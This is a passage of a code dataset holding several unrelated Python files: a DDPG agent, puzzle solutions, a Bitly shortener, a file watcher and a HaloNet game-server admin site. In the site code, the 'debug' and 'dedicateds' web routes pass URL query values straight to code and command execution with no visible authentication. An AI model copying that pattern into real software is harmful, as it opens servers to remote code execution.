lr=LR_ACTOR)\n\n self.critic_local = Critic(s_size, a_size, seed).to(self.device)\n self.critic_target = Critic(s_size, a_size, seed).to(self.device)\n self.critic_optim = optim.Adam(self.critic_local.parameters(), lr=LR_CRITIC)\n\n self.noise = OUNoise(a_size, seed)\n self.memory = ReplayBuffer(a_size, BUFFER_SIZE, BATCH_SIZE, seed)\n\n def step(self, state, action, reward, next_state, done):\n self.memory.add(state, action, reward, next_state, done)\n\n if len(self.memory) > BATCH_SIZE:\n experiences = self.memory.sample()\n self.learn(experiences, GAMMA)\n\n def act(self, state, add_noise=False):\n state = torch.from_numpy(state).float().to(self.device)\n self.actor_local.eval()\n with torch.no_grad():\n action = self.actor_local(state).cpu().data.numpy()\n self.actor_local.train()\n if add_noise:\n action += self.noise.sample()\n return np.clip(action, -1, 1)\n\n def reset(self):\n self.noise.reset()\n\n def learn(self, experiences, gamma):\n states = []\n actions = []\n rewards = []\n next_states = []\n dones = []\n\n for e in experiences:\n\n if len(states) == 0:\n states = np.append(states, e.state)\n actions = np.append(actions, e.action)\n rewards = np.append(rewards, e.reward)\n next_states = np.append(next_states, e.next_state)\n dones = np.append(dones, e.done)\n else:\n states = np.vstack((states, e.state))\n actions = np.vstack((actions, e.action))\n rewards = np.vstack((rewards, e.reward))\n next_states = np.vstack((next_states, e.next_state))\n dones = np.vstack((dones, e.done))\n\n # print(states)\n states = torch.from_numpy(states).float().to(self.device)\n actions = torch.from_numpy(actions).float().to(self.device)\n rewards = torch.from_numpy(rewards).float().to(self.device)\n next_states = torch.from_numpy(next_states).float().to(self.device)\t\t\t\n dones = torch.from_numpy(dones).float().to(self.device)\n \n # ---------------------------- update critic ---------------------------- #\n # Get predicted next-state actions and Q values from target models\n actions_next = self.actor_target(next_states)\n Q_targets_next = self.critic_target(next_states, actions_next)\n # Compute Q targets for current states (y_i)\n Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n # Compute critic loss\n Q_expected = self.critic_local(states, actions)\n critic_loss = F.mse_loss(Q_expected, Q_targets)\n # Minimize the loss\n self.critic_optim.zero_grad()\n critic_loss.backward()\n self.critic_optim.step()\n\n # ---------------------------- update actor ---------------------------- #\n # Compute actor loss\n actions_pred = self.actor_local(states)\n actor_loss = -self.critic_local(states, actions_pred).mean()\n # Minimize the loss\n self.actor_optim.zero_grad()\n actor_loss.backward()\n self.actor_optim.step()\n\n # ----------------------- update target networks ----------------------- #\n self.soft_update(self.critic_local, self.critic_target, TAU)\n self.soft_update(self.actor_local, self.actor_target, TAU) \n\n def soft_update(self, local_model, target_model, tau):\n for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):\n target_param.data.copy_(tau*local_param.data + (1.0-tau)*target_param.data)\n\n\nclass OUNoise:\n \"\"\"Ornstein-Uhlenbeck process.\"\"\"\n\n def __init__(self, size, seed, mu=0., theta=0.15, sigma=0.2):\n self.mu = mu * np.ones(size)\n self.theta = theta\n self.sigma = sigma\n self.seed = random.seed(seed)\n self.reset()\n\n def reset(self):\n self.state = copy.copy(self.mu)\n\n def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n self.state = x + dx\n return self.state\n\n\nclass ReplayBuffer:\n\n def __init__(self, action_size, buffer_size, batch_size, seed):\n\n self.memory = deque(maxlen=buffer_size) # internal memory (deque)\n self.batch_size = batch_size\n self.seed = random.seed(seed)\n\n def add(self, state, action, reward, next_state, done):\n e = Experience(state, action, reward, next_state, done)\n self.memory.append(e)\n\n def sample(self):\n return random.sample(self.memory, k=self.batch_size)\n\n def __len__(self):\n return len(self.memory)\n\n\nclass Experience:\n\n def __init__(self, state, action, reward, next_state, done):\n\n self.state = state\n self.action = action\n self.reward = reward\n self.next_state = next_state\n self.done = done","repo_name":"danielhazann/RL_project","sub_path":"LunarLanderContinuous/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":5807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74580553449","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 5 23:50:23 2019\n\n@author: redne\n\"\"\"\n\nmass=input(\"input\")\nmass=mass.split(\"\\n\")\nmass=[int(n) for n in mass]\n\ndef fuelCount(aMass):\n retval=int(aMass/3)-2\n if(retval<0):\n retval=0\n else:\n retval+=fuelCount(retval)\n \n return retval\n\nfuel=0\nfor i in mass:\n fuel+=fuelCount(i)\n \nprint(\"Fuel is\",fuel)","repo_name":"eqkessel/PythonSandbox","sub_path":"BrotherCodingCoOp/adventofcode2019_01_1.py","file_name":"adventofcode2019_01_1.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34715957782","text":"from src.dataset import get_test_dataset\nfrom src.config import Config as Cfg\nfrom src.model import load_model\n\n\n# Define model path\n# model_path = f'./models/cifar-10/{Cfg.MODEL_TYPE}'\nmodel_path = f'{Cfg.MODEL_PATH}/best'\n\n# Load model\nmodel, input_shape = load_model(model_path=model_path)\nprint(f'Model loads from {model_path}')\n\n# Get test dataset\ntest_dataset = get_test_dataset(input_shape=input_shape)\n\n# Evaluate model on test data\neval_results = model.evaluate(test_dataset)\n\nif Cfg.MODEL_TYPE == 'GoogLeNet':\n print(f'{Cfg.MODEL_TYPE} loss: {round(eval_results[1], ndigits=4)}'\n f'\\n{Cfg.MODEL_TYPE} accuracy: {round(100 * eval_results[4], ndigits=2)}')\nelse:\n print(f'{Cfg.MODEL_TYPE} loss: {round(eval_results[0], ndigits=4)}'\n f'\\n{Cfg.MODEL_TYPE} accuracy: {round(100 * eval_results[1], ndigits=2)}')\n\n","repo_name":"MrRiahi/Convolutional-Neural-Networks-Tensorflow","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"11860980727","text":"class Solution:\n def canPartition(self, nums: list[int]) -> bool:\n total = sum(nums)\n if(total % 2 == 1):\n return False\n half = total//2\n nums.sort\n # try to find items from nums that can add to half\n dp = [0]*(half+1)\n for i in range(len(nums)):\n for j in range(half, nums[i]-1, -1):\n dp[j] = max(dp[j], dp[j-nums[i]]+nums[i])\n print(dp)\n if dp[half] == half:\n return True\n return False\n\n\ns = Solution()\nnums = [1, 5, 5, 11]\nprint(s.canPartition(nums))\n","repo_name":"liu-yuxin98/LeetCodeHot100","sub_path":"Dynamic_Programming/416PartitionEqualSubsetSum.py","file_name":"416PartitionEqualSubsetSum.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38132494399","text":"class Solution:\n def backspaceCompare(self, s: str, t: str) -> bool:\n return self.type_str(s) == self.type_str(t)\n\n @staticmethod\n def type_str(ms):\n rst = []\n for i in ms:\n if i != '#':\n rst.append(i)\n elif rst:\n rst.pop()\n return rst\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n s = \"ab#c\"\n t = \"ad#c\"\n s = \"ab##\"\n t = \"c#d#\"\n s = \"a##c\"\n t = \"#a#c\"\n s = \"a#c\"\n t = \"b\"\n print(sol.backspaceCompare(s, t))\n","repo_name":"chyt123/cosmos","sub_path":"coding_everyday/lc500+/lc844/BackspaceStringCompare.py","file_name":"BackspaceStringCompare.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71968484648","text":"puzzle_input = [s.strip() for s in open('input.in').readlines()]\n\nposition = {\n 'a': {0, 2, 3, 5, 6, 7, 8, 9},\n 'b': {0, 4, 5, 6, 8, 9},\n 'c': {0, 1, 2, 3, 4, 7, 8, 9},\n 'd': {2, 3, 4, 5, 6, 8, 9},\n 'e': {0, 2, 6, 8},\n 'f': {0, 1, 3, 4, 5, 6, 7, 8, 9},\n 'g': {0, 2, 3, 5, 6, 8, 9}\n}\n\nsignal_length = {\n 2: {1},\n 3: {7},\n 4: {4},\n 5: {2, 3, 5},\n 6: {0, 6, 9},\n 7: {8}\n}\n\ntotal = 0\n\nfor line in puzzle_input:\n line = line.split(\" | \")\n\n possible = {}\n\n # generate possibilities\n for signal in line[0].split(\" \"):\n signal = set(signal)\n possible_nums = signal_length[len(signal)]\n\n for pos in position:\n if possible_nums.issubset(position[pos]):\n if possible.get(pos) is None: possible[pos] = signal\n else: possible[pos] = signal.intersection(possible[pos])\n\n # now good enough? lol\n while (sum([len(set) for set in possible.values()])) > 7:\n for v in filter(lambda s: len(s) == 1, possible.values()):\n pos = list(v)[0]\n for other_v in filter(lambda s: len(s) > 1, possible.values()):\n other_v.discard(pos)\n\n wire_mapping = {}\n\n for i in range(0, 10):\n letters = []\n for letter in position:\n if i in position[letter]:\n letters.append(letter)\n\n for j in range(len(letters)):\n letters[j] = list(possible[letters[j]])[0]\n\n word = ''.join(sorted(letters))\n wire_mapping[word] = i\n\n digits = ''\n for signal in line[1].split(\" \"):\n num = wire_mapping[''.join(sorted(signal))]\n digits += str(num)\n\n total += int(digits)\n\nprint(\"total:\", total)\n","repo_name":"ericpretzel/advent-of-code","sub_path":"2021/day08/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71475088169","text":"partidoA = []\npartidoB = []\npartidoC = []\n\ndef urna():\n while True:\n inicial = input(\"Urna Eletrônica\\nPartidoA [10]\\nPartidoB [11]\\nPartidoC [12]\\nSelecione o número do partido (0 para sair): \")\n\n if inicial == '10':\n candidatoA = input(\"Você escolheu o PartidoA. Digite '1' para confirmar o voto ou '0' para voltar ao início: \")\n\n if candidatoA == '1':\n print(\"Voto confirmado com sucesso\")\n voto = 1\n partidoA.append(voto)\n print(partidoA)\n\n elif inicial == '11':\n candidatoB = input(\"Você escolheu o PartidoB. Digite '1' para confirmar o voto ou '0' para voltar ao início: \")\n\n if candidatoB == '1':\n print(\"Voto confirmado com sucesso\")\n voto = 1\n partidoB.append(voto)\n print(partidoB)\n\n elif inicial == '12':\n candidatoC = input(\"Você escolheu o PartidoC. Digite '1' para confirmar o voto ou '0' para voltar ao início: \")\n\n if candidatoC == '1':\n print('Voto confirmado com sucesso')\n voto = 1\n partidoC.append(voto)\n print(partidoC)\n\n elif inicial == '0':\n break\n\n if sum(partidoA) == 20:\n print(\"PartidoA venceu as eleições!\")\n break\n\n elif sum(partidoB) == 20:\n print(\"PartidoB venceu as eleições!\")\n break\n\n elif sum(partidoC) == 20:\n print(\"PartidoC venceu as eleições!\")\n break\n\nurna()\n","repo_name":"lucascampos04/Urna","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72529438568","text":"\"\"\"\nFork of setuptools' install_lib command that installs the native\njep library, the jar file, and the python files to the\ninstall_dir + 'jep', typically site-packages/jep.\n\"\"\"\n\nfrom commands.util import is_osx\nfrom commands.util import is_windows\nfrom commands.link_util import link_native_lib\nfrom commands.python import get_python_lib_dir\nfrom setuptools.command.install_lib import install_lib\nimport os\n\n\nclass jep_install(install_lib):\n\n def install(self):\n build_ext = self.get_finalized_command('build_ext')\n jep_built_path = build_ext.get_outputs()[0]\n version = self.distribution.metadata.get_version()\n\n if os.path.isdir(self.build_dir):\n jep_install_dir = os.path.join(self.install_dir, 'jep')\n if not os.path.exists(jep_install_dir):\n os.makedirs(jep_install_dir)\n\n # let's put the native lib in site-packages/jep where it belongs\n lib_copied = self.copy_file(\n jep_built_path,\n os.path.join(jep_install_dir, os.path.basename(jep_built_path)))\n\n # let's copy the jar file too\n jar_name = 'jep-{0}.jar'.format(version)\n jar_copied = self.copy_file(\n os.path.join('build', 'java', jar_name),\n os.path.join(jep_install_dir, jar_name))\n\n # let's copy the jep package to site-packages\n py_copied = self.copy_tree(\n os.path.join(self.build_dir, 'jep'),\n jep_install_dir)\n\n # now let's give it a link that works for Java\n # System.loadLibrary(\"jep\")\n link_native_lib(jep_install_dir, jep_built_path)\n else:\n self.warn(\"'%s' does not exist -- no Python modules to install\" %\n self.build_dir)\n return\n","repo_name":"ninia/jep","sub_path":"commands/install_lib.py","file_name":"install_lib.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":1185,"dataset":"github-code","pt":"53"} +{"seq_id":"34859323960","text":"import re\n\nfrom stringfinder.reference_finder import ReferenceFinder\n\n\n# --need to consider whether to create a module or an article from the php code\ndef conversion_format_detector(file_name_list):\n file_details = []\n for file_name in file_name_list:\n with open(file_name, \"r\") as altered_source:\n source = altered_source.read()\n source = source.replace(\"\\n\", \" \")\n\n ref = ReferenceFinder()\n php_occurrences = ref.get_php_occurrences(source)\n\n # --if there is a html header, get the count of the header part of the file\n if re.findall('', source).__len__() > 0:\n header = re.findall('(.*?)', source)\n header_length = len('') + len(header[0])\n elif re.findall('', source).__len__() > 0:\n header = re.findall('((.*?))', source)\n header_length = len('') + len(header[0])\n else:\n header_length = 0\n\n file_length = source.__len__()\n\n # --get the total length of php codes\n total_php_length = 0\n for occurrence in php_occurrences:\n total_php_length = total_php_length + len(occurrence) + len(\"\")\n\n # --check whether the file contains a html header\n if header_length > 0:\n total_php_length = total_php_length + len(\"\")\n\n # --check whether the file contains more than php codes\n # print(file_length - header_length)\n # print(total_php_length)\n\n if file_length - header_length > total_php_length:\n file_details.append(\"article : \" + file_name)\n else:\n file_details.append(\"separate : \" + file_name)\n return file_details\n\n# --not completed yet\n# conversion_format_detector(file_name_list=[\n# \"/home/shan/Developments/Projects/research-devs/Blog/User/post/post_image_edit.php\"])\n","repo_name":"ShanChathusanda93/python-devs","sub_path":"filehandler/FileParser.py","file_name":"FileParser.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11874597441","text":"\"\"\"\nMonitors our code & docs for changes\n\"\"\"\nimport os\nimport sys\nimport subprocess\nimport datetime\nimport time\n\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\nBASEDIR = os.path.abspath(os.path.dirname(__file__))\n\ndef get_now():\n \"Get the current date and time as a string\"\n return datetime.datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\")\n\ndef build_docs():\n \"\"\"\n Run the Sphinx build (`make html`) to make sure we have the\n latest version of the docs\n \"\"\"\n\n print >> sys.stderr, \"Building docs at %s\" % get_now()\n os.chdir(os.path.join(BASEDIR, \"docs\"))\n subprocess.call(r'make.bat html')\n\ndef run_tests():\n \"Run unit tests with unittest.\"\n\n print >> sys.stderr, \"Running unit tests at %s\" % get_now()\n os.chdir(BASEDIR)\n subprocess.call(r'python -m unittest discover -b')\n\ndef getext(filename):\n \"Get the file extension.\"\n\n return os.path.splitext(filename)[-1].lower()\n\nclass ChangeHandler(FileSystemEventHandler):\n \"\"\"\n React to changes in Python and Rest files by\n running unit tests (Python) or building docs (.rst)\n \"\"\"\n\n def on_any_event(self, event):\n \"If any file or folder is changed\"\n\n if event.is_directory:\n return\n if getext(event.src_path) == '.py':\n run_tests()\n elif getext(event.src_path) == '.rst':\n build_docs()\n\ndef main():\n \"\"\"\n Called when run as main.\n Look for changes to code and doc files.\n \"\"\"\n\n while 1:\n \n event_handler = ChangeHandler()\n observer = Observer()\n observer.schedule(event_handler, BASEDIR, recursive=True)\n observer.start()\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n\nif __name__ == '__main__':\n main()\n","repo_name":"Arup/jobSearchBot","sub_path":"monitorChanges.py","file_name":"monitorChanges.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3976555757","text":"import os\nimport requests\nfrom urllib.parse import urlparse\nfrom dotenv import load_dotenv\nimport argparse\n\n\ndef shorten_link(link, token):\n url = 'https://api-ssl.bitly.com/v4/shorten'\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n\n payload = {\n \"long_url\": link\n }\n\n response = requests.post(url, headers=headers, json=payload)\n response.raise_for_status()\n return response.json()[\"link\"]\n\n\ndef count_clicks(link, token):\n parsed_url = urlparse(link)\n url_without_scheme = f\"{parsed_url.netloc}/{parsed_url.path}\"\n\n url = f'https://api-ssl.bitly.com/v4/bitlinks/{url_without_scheme}/clicks/summary'\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n return response.json()['total_clicks']\n\n\ndef is_bitlink(link, token):\n parsed_url = urlparse(link)\n url_without_scheme = f\"{parsed_url.netloc}/{parsed_url.path}\"\n\n url = f'https://api-ssl.bitly.com/v4/bitlinks/{url_without_scheme}'\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n\n response = requests.get(url, headers=headers)\n return response.ok\n\n\nif __name__ == '__main__':\n load_dotenv()\n token = os.environ['BITLY_TOKEN']\n parser = argparse.ArgumentParser(\n description='сокращаят ссылки и считает клики'\n )\n parser.add_argument('link', help='ваша ссылка')\n args = parser.parse_args()\n user_url = args.link\n try:\n if is_bitlink(user_url, token):\n clicks_count = count_clicks(user_url, token)\n print(clicks_count)\n else:\n bitlink = shorten_link(user_url, token)\n print(bitlink)\n except requests.exceptions.HTTPError:\n print(\"ошибка неверная ссылка\")","repo_name":"KirillKTA/BITLY","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71873436327","text":"import asyncio\nimport json\nfrom copy import deepcopy\nfrom datetime import timedelta\nfrom email.mime.multipart import MIMEMultipart\nfrom typing import TYPE_CHECKING\n\nfrom aiohttp import web\n\nimport HaloNet\n\nfrom Core.ConfigSystem.AppsConfig import SiteConfigBase\nfrom Core.Framework import *\nfrom Types import FOnlineStatisticEntry\n\nif TYPE_CHECKING:\n from BaseApp import BaseApp\n\nfrom Core.SiteUtils import route, web_run_app, from_file\nfrom Core.Type import TypeBase\nfrom Core.Utils import PyCharm_go_to, UnrealEngine4_go_to\nimport smtplib\nfrom email.mime.text import MIMEText\n\n\n\n@runnable\nclass Site(Service):\n config: SiteConfigBase\n\n async def start(self):\n from Supervisor import Supervisor\n self.sv = await self.get_single_service(\"Supervisor\")\n self.base: 'BaseApp' = await self.sv.RequestService(\"BaseApp\")\n self.supervisor: Supervisor = await make_default_service_mailbox(\"Supervisor\")\n\n self.web_app = web.Application(loop=asyncio.get_event_loop())\n\n for r in self.__routes__:\n self.web_app.router.add_route(r['method_type'], r['path'], getattr(self, r['method']))\n\n self.web_app.router.add_static('/static/', f\"{Globals.workspace}/Services/{self.__class__.__name__}/static\",\n show_index=True,\n follow_symlinks=True)\n # self.web_init()\n\n if self.smtp_used:\n self.smtp = smtplib.SMTP(self.config.SMTP.Server)\n self.smtp.ehlo()\n self.smtp.starttls()\n self.smtp.login(self.config.SMTP.Source.login, self.config.SMTP.Source.password)\n else:\n self.smtp = None\n\n\n self.srv, self.srv_handler = await web_run_app(self.web_app,\n host=self.config.RoutingEndpoint[0],\n port=self.config.RoutingEndpoint[1],\n print=INFO_MSG)\n\n def __adel__(self):\n if self.smtp:\n self.smtp.quit()\n\n @property\n def smtp_used(self):\n return self.config.SMTP.Use\n\n @route(route_path='/')\n async def index(self, req: web.Request):\n return dict(BASE_ACTIVE=is_valid(self.base))\n\n # @route()\n # async def reg(self, req: web.Request):\n # if is_valid(self.base):\n # query = req.rel_url.query\n # if query.get('act', None) == 'reg':\n # username = query.get('username', None)\n # mail = query.get('mail', None)\n # password = query.get('password', None)\n # if username and password and mail:\n #\n # try:\n # success, user_id, digest = await asyncio.wait_for( self.base.RegisterUser(username, mail, password, self.smtp_used), 5 )\n #\n # if digest and self.smtp:\n #\n # data = from_file(\"Site/mail_template.html\", **dict(\n # ADDRESS=f\"http://{self.config.RoutingEndpoint[0]}:{self.config.RoutingEndpoint[1]}/reg?act=confirm&digest={digest}\"\n # )).decode()\n #\n # msg = MIMEMultipart('alternative')\n # msg['Subject'] = \"HaloNetExample\"\n # msg['From'] = self.config.SMTP.Source.mail\n # msg['To'] = mail\n #\n # part1 = MIMEText('Hello!', 'plain')\n # part2 = MIMEText(data, 'html')\n # msg.attach(part1)\n # msg.attach(part2)\n #\n # self.smtp.sendmail(self.config.SMTP.Source.mail, [mail], msg.as_string())\n #\n # return dict(BASE_ACTIVE=is_valid(self.base),\n # DONE_DATA={\n # \"success\": success,\n # \"username\": username,\n # \"user_id\": user_id\n # })\n # except asyncio.TimeoutError:\n # return dict(BASE_ACTIVE=is_valid(self.base),\n # TIMEOUT=True)\n # if query.get('act', None) == 'confirm':\n # digest = query.get('digest')\n # success, username = await asyncio.wait_for( self.base.ConfirmUser(digest, True), 5)\n # return dict(BASE_ACTIVE=is_valid(self.base),\n # CONFIRM_DATA={\n # \"success\": success,\n # \"username\": username,\n # })\n\n\n return dict(BASE_ACTIVE=is_valid(self.base), REG_WITH_MAIL=self.smtp_used)\n\n @route()\n async def dedicateds(self, req: web.Request):\n\n # servers_count = await self.supervisor.GetDedicatedServersCount()\n\n servers_info = await self.supervisor.GetDedicatedServersInfo()\n\n if is_valid(self.base):\n\n query = req.rel_url.query\n\n if query.get('act', None) == \"stop\":\n index = query.get('index', None)\n try:\n await asyncio.wait_for(self.supervisor.ShutdownDedicatedServer(int(index)), 5)\n except asyncio.TimeoutError:\n return dict(BASE_ACTIVE=is_valid(self.base),\n SERVERS=[],\n TIMEOUT=True)\n\n if query.get('act', None) == \"reset\":\n index = query.get('index', None)\n try:\n await asyncio.wait_for(self.supervisor.ResetDedicatedServer(int(index)), 5)\n except asyncio.TimeoutError:\n return dict(BASE_ACTIVE=is_valid(self.base),\n SERVERS=[],\n TIMEOUT=True)\n\n servers_info = await self.supervisor.GetDedicatedServersInfo()\n\n if query.get('act', None) == 'run':\n index = query.get('index', None)\n command = query.get('command', None)\n if index and command:\n try:\n await asyncio.wait_for(self.supervisor.ExecuteCommandOnDedicatedServer(int(index), command), 5)\n return dict(BASE_ACTIVE=is_valid(self.base),\n SERVERS=servers_info)\n except asyncio.TimeoutError:\n return dict(BASE_ACTIVE=is_valid(self.base),\n SERVERS=servers_info,\n TIMEOUT=True)\n\n return dict(BASE_ACTIVE=is_valid(self.base), SERVERS=servers_info)\n\n @route()\n async def storages(self, req: web.Request):\n if is_valid(self.base):\n query = req.rel_url.query\n act = query.get('act', None)\n\n if act == 'reload':\n try:\n await asyncio.wait_for(self.base.ReloadStorages(), 5)\n return dict(BASE_ACTIVE=is_valid(self.base))\n except asyncio.TimeoutError:\n return dict(BASE_ACTIVE=is_valid(self.base), TIMEOUT=True)\n if act == 'upload_configs':\n try:\n\n await asyncio.wait_for(self.base.UploadStoragesFromConfigs(), 5)\n return dict(SUCCESS=True, BASE_ACTIVE=is_valid(self.base))\n except asyncio.TimeoutError:\n return dict(BASE_ACTIVE=is_valid(self.base), TIMEOUT=True)\n\n if act == 'view':\n try:\n storage_info = None\n storage_list = await asyncio.wait_for(self.base.GetStorageNames(), 5)\n storage_name = query.get('storage', None)\n if storage_name is not None:\n storage_typename, storage_data = await asyncio.wait_for(self.base.GetStorageData(storage_name), 5)\n T = TArray[TypeBase.find_type(storage_typename)]\n ds = T.deserialize(storage_data)\n self.interact_storage(ds)\n storage_info = json.dumps(ds, indent=\"    \", separators=(\",\", \": \")).replace(\"\\n\", \"
\").replace(\"^^\", '\"')\n return dict(STORAGE_INFO=storage_info, BASE_ACTIVE=is_valid(self.base), STORAGES=storage_list)\n except asyncio.TimeoutError:\n return dict(BASE_ACTIVE=is_valid(self.base), TIMEOUT=True)\n\n\n return dict(BASE_ACTIVE=is_valid(self.base))\n\n def parse_asset(self, asset_path):\n true_path = None\n if asset_path.startswith(\"Blueprint'\") and asset_path.endswith(\"'\"):\n true_path = asset_path[10:-1] + \"_C\"\n elif asset_path.startswith(\"/Game\") and asset_path.endswith(\"_C\"):\n true_path = asset_path\n\n if true_path is not None:\n return f\"\"\"{asset_path} \"\"\"\n else:\n return asset_path\n\n def interact_storage(self, st_data):\n if isinstance(st_data, list):\n for i, entry in enumerate(st_data):\n if isinstance(entry, (list, dict)):\n self.interact_storage(entry)\n elif isinstance(entry, set):\n st_data[i] = list(entry)\n elif isinstance(entry, str):\n st_data[i] = self.parse_asset(st_data[i])\n elif isinstance(st_data, dict):\n for key, value in st_data.items():\n if isinstance(value, (list, dict)):\n self.interact_storage(value)\n elif isinstance(value, set):\n st_data[key] = list(value)\n elif isinstance(value, str):\n st_data[key] = self.parse_asset(st_data[key])\n\n\n @route()\n async def docs(self, req: web.Request):\n query = req.rel_url.query\n generated_info = deepcopy(ConfigurationGenerator().generated_info)\n\n\n entities = dict()\n\n types = deepcopy(ConfigurationGenerator().generated_types)\n\n for entity_name, entity_info in generated_info.items():\n if entity_name not in entities.keys():\n entities[entity_name] = dict(context_data=dict())\n\n for context_name, context_data in entity_info.items():\n if context_name not in entities[entity_name]['context_data']:\n entities[entity_name]['context_data'][context_name] = context_data\n\n additional_entity_info = dict()\n additional_entity_info['Doc'] = None\n\n if 'base' in entity_info:\n additional_entity_info['Doc'] = entity_info['base']['Doc']\n else:\n additional_entity_info['Doc'] = list(entity_info.values())[0]['Doc']\n\n additional_entity_info['ContextName'] = None\n if len(entity_info) == 1 and list(entity_info.values())[0].get(\"IsApplication\", None):\n additional_entity_info['ContextName'] = list(entity_info.keys())[0]\n\n additional_entity_info['IsApp'] = len(entity_info) == 1 and list(entity_info.values())[0].get(\"IsApplication\", None)\n additional_entity_info['IsExposedApp'] = len(entity_info) == 1 and list(entity_info.values())[0].get(\"Exposed\", None)\n\n entities[entity_name].update({'additional': deepcopy(additional_entity_info)})\n\n if query.get('cat', None) == 'entities':\n return dict(ENTITIES=entities, BACK=True)\n\n elif query.get('cat', None) == 'types':\n return dict(TYPES=types, BACK=True)\n\n elif query.get('act', None) == 'pycharm_goto':\n PyCharm_go_to(query.get('filename', \"\"), query.get('linenumber', \"\"))\n return dict()\n\n elif query.get('act', None) == 'ue4_goto':\n UnrealEngine4_go_to(query.get('asset', \"\"))\n return dict()\n\n entity = query.get('entity', None)\n if entity is not None and entity in generated_info:\n return dict(ENTITY=entities[entity], ENTITY_NAME=entity, BACK=True)\n\n return dict(BROWSE_ALL=True)\n\n @route()\n async def debug(self, req: web.Request):\n if is_valid(self.base):\n query = req.rel_url.query\n exec = query.get(\"exec\", None)\n result = \"\"\n if exec is not None:\n result = await self.base.ExecuteCode(exec)\n\n entity_info = \"\"\n query = req.rel_url.query\n if query.get('act', None) == \"view\":\n entity_id = query.get('id', None)\n\n action_name = query.get('action', None)\n if action_name:\n await self.base.CallDisplayAction(entity_id, action_name)\n\n if entity_id is not None:\n entity_info = await self.base.GetEntityViewInfo(entity_id)\n\n debug_info = await self.base.GetDebugInfo()\n return dict(BASE_ACTIVE=is_valid(self.base),\n ENTITIES=debug_info,\n RESULT=result,\n VIEW_STRUCTURE=entity_info)\n return dict(BASE_ACTIVE=is_valid(self.base))\n\n @route()\n async def visor(self, req: web.Request):\n if is_valid(self.supervisor):\n query = req.rel_url.query\n if query.get('act', None) == \"exec\":\n cmd = query.get('cmd', None)\n id = query.get('id', None)\n if cmd and id:\n self.base.ExecuteMatchConsoleCommand(id, cmd)\n else:\n WARN_MSG(\"Wrong query for 'exec'\")\n\n if query.get('act', None) == \"test\":\n try:\n await self.supervisor.minitest()\n except Exception:\n print('test2')\n\n states = await self.supervisor.GetBaseAppsGenericStatesInfo()\n online: TArray[FOnlineStatisticEntry] = [] # await self.base.RequestOnline()\n\n new_online = list()\n last_online = None\n for o in online:\n if last_online is None:\n last_online = o\n new_online.append(last_online)\n\n if o['Date'] - last_online['Date'] > timedelta(minutes=15):\n new_online.append(o)\n last_online = o\n continue\n\n if o['OnlineCount'] > last_online['OnlineCount']:\n last_online['OnlineCount'] = o['OnlineCount']\n\n if o['InGameCount'] > last_online['InGameCount']:\n last_online['InGameCount'] = o['InGameCount']\n\n return dict(INFO=states, ONLINE=new_online)\n\n return dict()","repo_name":"broly/HaloNet","sub_path":"HaloNet/Services/Site.py","file_name":"Site.py","file_ext":"py","file_size_in_byte":14974,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"3242946963","text":"from Parcial.Clase import Transaccion\nimport json\n\ndef test_creacion_archivo():\n transaccion_a = Transaccion(dni_cliente= \"45990339\", tipo_movimiento= \"CONSUMO\", monto_movimiento=2000, estado= \"RECHAZADO\", nombre_comercio= \"MUSIMUNDO\")\n transaccion_b = Transaccion(dni_cliente= \"45990339\", tipo_movimiento= \"CONSUMO\", monto_movimiento=2000, estado= \"APROBADO\", nombre_comercio= \"MUSIMUNDO\")\n transaccion_c = Transaccion(dni_cliente= \"30949303\", tipo_movimiento= \"CASH_IN\", monto_movimiento=50000, estado= \"APROBADO\", nombre_comercio= \"PAGOFACIL\")\n transaccion_a.save_trans(transaccion_a)\n transaccion_b.save_trans(transaccion_b)\n transaccion_c.save_trans(transaccion_c)\n\ntest_creacion_archivo()\n\ndef test_monto_movimiento():\n transaccion_a = Transaccion(dni_cliente= \"45990339\", tipo_movimiento= \"CONSUMO\", monto_movimiento= 200000, estado= \"APROBADO\", nombre_comercio= \"DISCO\")\n transaccion_a.save_trans(transaccion_a)\n transaccion_a.trans_mayor_100000()\n\ntest_monto_movimiento()\n\ndef 